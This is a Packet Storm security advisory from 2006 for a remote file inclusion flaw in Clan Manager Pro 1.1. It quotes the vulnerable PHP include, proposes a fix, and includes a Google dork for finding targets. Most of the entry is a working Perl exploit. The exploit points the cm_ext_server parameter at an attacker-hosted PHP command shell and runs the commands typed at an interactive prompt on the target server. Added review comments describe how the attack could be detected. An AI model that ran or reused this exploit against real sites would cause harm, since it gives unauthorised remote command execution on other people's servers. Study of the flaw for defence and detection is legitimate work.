cmpro-1.1.txt

2006-06-11T00:00:00
ID PACKETSTORM:47211
Type packetstorm
Reporter Florian Strankowski
Modified 2006-06-11T00:00:00

Description

                                        
                                            `Hi,  
  
http://sx02.coresec.de/advisories/149.txt  
  
-- cut here --  
  
#!/usr/bin/perl  
############  
# Clan Manager Pro (CMPRO) <= 1.1  
#  
# Homepage: www.cmpro.org  
# Affected Version: <= 1.1  
# Patched Version: /  
# Date: 06.06.2006  
#  
# Application Risk: High  
#  
# Vendor notified : 06.06.2006  
#  
#  
# Exploit written : Sx02  
# http://sx02.coresec.de  
#  
# usage:# perl cmpro.pl <host> <command shell url> <cmd variable (e.g.:   
cmd)>  
# perl cmpro.pl http://localhost/path/to/cmpro.extern/   
http://localhost/cmd.gif cmd  
#  
# cmd shell example: <? system($cmd); ?>  
# cmd variable: cmd;  
#  
#  
#  
# DORK: inurl:"cmpro.ext"  
#############  
#  
# Vulnerable code (cmpro_header.inc.php)  
#  
# INCLUDE($cm_ext_server.'/config/einstellungen.inc.php');  
# INCLUDE($sitepath.'cmpro.ext/global.functions.php');  
#  
# --------------------------------------------------------  
#  
# $cm_ext_server and $sitepath are never initialised by the script  
# before these INCLUDE() calls, so a request parameter can set them  
# (presumably via register_globals); this is a remote file inclusion.  
#  
# cmpro_header.inc.php?cm_ext_server=CMD  
# cmpro_header.inc.php?sitepath=CMD  
#  
# --------------------------------------------------------  
#  
# Solution :  
#  
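# declare (initialise) $cm_ext_server and $sitepath with fixed values  
# before they are used in INCLUDE(); turning off register_globals and  
# remote URL includes (allow_url_fopen) in php.ini limits the impact as well.  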
#  
# --------------------------------------------------------  
#  
# "Everything should be made as simple as possible, but not simpler"  
# 'Albert Einstein'  
#  
############  
use LWP::UserAgent;  
  
# Top-level driver: takes <host>, <command shell url> and <cmd variable>
# from the command line, then reads lines from STDIN and issues one HTTP GET
# per line against cmpro_header.inc.php, printing the response body.
# NOTE(review): there is no `use strict` / `use warnings`; every variable
# below is a package global.
$Path = $ARGV[0];  
$Pathtocmd = $ARGV[1];  
$cmdv = $ARGV[2];  
# The two URL arguments only have to contain "http://" somewhere (the
# patterns are unanchored); a false third argument also ends in usage(),
# which exits.
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }  
head();  
# Empty loop condition: presumably treated by perl as always true, so this
# outer loop does not end on its own.
while() {  
print "[shell] \$";  
# One request per line read from STDIN.
while(<STDIN>) {  
$cmd=$_;  
chomp($cmd);  
# A false line (empty, or "0") leaves the inner loop; the outer loop then
# prints the prompt again.
if (!$cmd) {last;}  
$xpl = LWP::UserAgent->new() or die;  
# Request shape, i.e. what the target's access log would record:
#   GET <host>cmpro_header.inc.php?cm_ext_server=<url>?&<var>=<line>
# The pieces are concatenated as-is, without URL-encoding.
# Detection: a cm_ext_server (or sitepath) parameter whose value is itself
# an http:// URL is the indicator to alert on. The user agent is not
# overridden here, so LWP's default ("libwww-perl/<version>") would be
# sent; treat that only as a weak secondary signal.
# The vulnerable INCLUDE() quoted in the header then makes the web server
# fetch <url> itself, so outbound HTTP from the web server is a second
# place to detect or block this.
# HTTP::Request is not imported explicitly; presumably it is loaded by
# LWP::UserAgent.
$req = HTTP::Request->new(GET   
=>$Path.'cmpro_header.inc.php?cm_ext_server='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or   
die "\nCould Not connect\n";  
$res = $xpl->request($req);  
$return = $res->content;  
# tr/// treats the brackets as literal characters mapped to themselves, so
# the net effect is newline -> placeholder character. That lets the `.` in
# /(.*)/ below span the whole body; the mapping is reversed before printing.
$return =~ tr/[\n]/[ê]/;  
# Body text the script takes to mean the remote URL could not be fetched;
# it reports that and stops.
if ($return =~/Error: HTTP request failed!/ ) {  
print "\nInvalid path for phpshell\n";  
exit;  
# Body starting with "<br", "/>", "<b>Fatal" and "error" (each `.` matches
# any one character): a message is printed, then execution continues with
# the next `if`.
} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {  
print "\nInvalid Command, error.\n\n";  
}  
# /(.*)/ matches any string, including the empty one, so the else branch
# below appears unreachable. The body is printed with newlines restored and
# `last` leaves the inner loop.
if ($return =~ /(.*)/) {  
$finreturn = $1;  
$finreturn=~ tr/[ê]/[\n]/;  
print "\r\n$finreturn\n\r";  
last;  
} else {  
print "[shell] \$";  
}  
}  
# NOTE(review): this `last` sits after the outer loop's closing brace, i.e.
# outside any loop; with the outer loop never ending it appears unreachable.
} last;  
  
sub head() {
    # Banner: a rule, two title lines and a closing rule, written to STDOUT
    # in that order. Every line ends in CRLF; the first rule is preceded by
    # a bare newline.
    my @banner_lines = (
        "\n============================================================================\r\n",
        " CMPro CMS <= 1.1 Remote Command Execution Exploit\r\n",
        " Vulnerable found and Exploit written by Sx02\r\n",
        "============================================================================\r\n",
    );
    print join('', @banner_lines);
}
  
sub usage() {
    # Show the banner followed by the argument help, then terminate the
    # script. Called when the command-line arguments fail the start-up check.
    head();
    my @help_lines = (
        " Usage: perl cmpro.pl <host> <command-url> <cmd>\r\n\n",
        # The original literal was wrapped across two source lines, so it
        # carries trailing spaces and a bare newline before the CRLF; kept
        # as-is so the output does not change.
        " <host> - Path to CMPro Directory : http://localhost/path/to/cmpro/   \n\r\n",
        " <command-url> - PhpShell : http://localhost/cmd.gif \r\n",
        " <cmd> - var name used in phpshell : cmd \r\n\r\n",
    );
    print join('', @help_lines);
    exit();
}
-- cut here --   
`